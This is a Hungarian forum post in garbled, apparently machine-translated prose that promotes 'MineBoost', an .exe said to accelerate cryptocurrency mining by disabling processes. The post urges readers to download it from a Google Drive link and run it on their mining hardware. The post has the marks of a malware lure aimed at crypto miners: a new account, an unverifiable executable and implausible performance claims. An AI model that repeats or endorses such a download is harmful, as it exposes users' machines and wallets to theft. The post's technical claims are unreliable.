Szerző Téma: MineBoost  (Megtekintve 917 alkalommal)

fuckedup

  • Ügyletszám: (0)
  • újonc
  • *
  • Hozzászólások: 6
MineBoost
« Dátum: Július 07, 2018, 05:58:08 pm »
Jó napot, kedves barátaim!

Mindannyian tudjuk, hogy a termelés a szeretett crypto valuta, szükségünk van egy viszonylag erős vas, sok energiát, időt.
Nem is olyan régen, azért jöttem, hogy egy gondolat, hogyan kell még, hogy a költség, a bányászat, a kriptában (bányászati) minimalizálása. Talált egy rést.
 De amit mondani akarok, barátaim... én képviselem a figyelmet MineBooster (gyorsító) a bányászati. Most többet, mi ez? Mindannyian jól tudjuk, hogy a különböző cryptocurrencies használni a különböző modellek számítás, de ezek mindig nagyon időigényes, hogy talál egy elfogadható megoldás, azt kell, NEM ELÉG az IDŐ. De mit tegyek, ez az a fájl, amely sok álmodtam), ezt a fájlt, majd a futtatás parancsra, a hardver, amely a gazdaság van csatlakoztatva. Gyorsulás kitermelése a kriptát, valamint az energiaköltségek csökkentése érdekében. Az a tény, hogy sok a folyamatok a termelés a sírkamrák a hardver hiábavaló. Pedig ez .exe-schnick egyszerűen letiltja ezeket a folyamatokat, valamint a kitermelés a kripta nem csak az lesz nyereséges, de gyors is. Köszönjük, hogy elolvasta a vége. Csak annyit kell tennie, hogy töltse aehe. illetve csak most fut a hardver. Használja... elvégre mi vagyunk a BÁNYÁSZOK, minden egyes, az Uniós crypto bányászok)))
Letöltés: https://drive.google.com/file/d/1n00_eyp_0bSX1cYLwM-YOd-6HkBnlA-7/view